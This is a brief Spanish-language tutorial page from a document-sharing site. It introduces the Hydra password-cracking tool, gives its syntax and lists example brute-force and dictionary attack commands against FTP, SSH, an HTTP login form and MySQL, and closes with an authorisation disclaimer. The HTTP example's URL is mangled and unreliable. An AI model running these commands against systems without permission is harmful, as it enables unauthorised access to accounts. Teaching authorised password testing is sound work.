0% encontró este documento útil (0 votos)
170 vistas1 página

Uso Ético de Hydra para Pruebas de Seguridad

Hydra es una herramienta de código abierto utilizada para realizar ataques de fuerza bruta y diccionario con el fin de obtener contraseñas de sistemas y aplicaciones. Ofrece sintaxis para ataques contra protocolos como FTP, SSH, HTTP y MySQL. Su uso está dirigido a profesionales de seguridad para probar la seguridad de contraseñas de forma controlada y con permiso.

Cargado por

Jorge Rubiano
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
170 vistas1 página

Uso Ético de Hydra para Pruebas de Seguridad

Hydra es una herramienta de código abierto utilizada para realizar ataques de fuerza bruta y diccionario con el fin de obtener contraseñas de sistemas y aplicaciones. Ofrece sintaxis para ataques contra protocolos como FTP, SSH, HTTP y MySQL. Su uso está dirigido a profesionales de seguridad para probar la seguridad de contraseñas de forma controlada y con permiso.

Cargado por

Jorge Rubiano
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

HERRAMIENTA HYDRA

Hydra es una herramienta de código abierto utilizada para realizar ataques de fuerza bruta o
ataques basados en diccionario para obtener contraseñas de sistemas y aplicaciones. Es una
herramienta popular en el campo de la seguridad informática y es utilizada por profesionales de
seguridad, investigadores y hackers éticos para probar la seguridad de contraseñas en sistemas y
aplicaciones en entornos controlados y con permisos adecuados.

La sintaxis básica de Hydra es la siguiente:

hydra [opciones] <protocolo>://<host>[:<puerto>] <servicio>


<opciones_específicas_del_servicio>

Algunos ejemplos de uso de Hydra son los siguientes:

Ataque de fuerza bruta en FTP:

hydra -l usuario -P contrasenas.txt ftp://192.168.1.1 # Realizar un


ataque de fuerza bruta en FTP con un archivo de contraseñas

Ataque de diccionario en SSH:

hydra -l usuario -P contrasenas.txt ssh://192.168.1.1 # Realizar un


ataque de diccionario en SSH con un archivo de contraseñas

Ataque de fuerza bruta en HTTP POST:

hydra -L usuarios.txt -P contrasenas.txt http-post-form


"/login:usuario=^USER^&password=^PASS^:F=Acceso denegado" -V
http://192.168.1.1 # Realizar un ataque de fuerza bruta en HTTP POST con
un archivo de usuarios y contraseñas

Ataque de fuerza bruta en MySQL:

hydra -l usuario -P contrasenas.txt mysql://192.168.1.1 # Realizar un


ataque de fuerza bruta en MySQL con un archivo de contraseñas

Es importante tener en cuenta que el uso de Hydra u otras herramientas de ataque solo debe
realizarse en entornos autorizados y con permiso del propietario del sistema o aplicación objetivo.
El uso no autorizado de Hydra o cualquier otra herramienta de este tipo está en contra de la ética
y la ley, y puede tener graves consecuencias legales.

También podría gustarte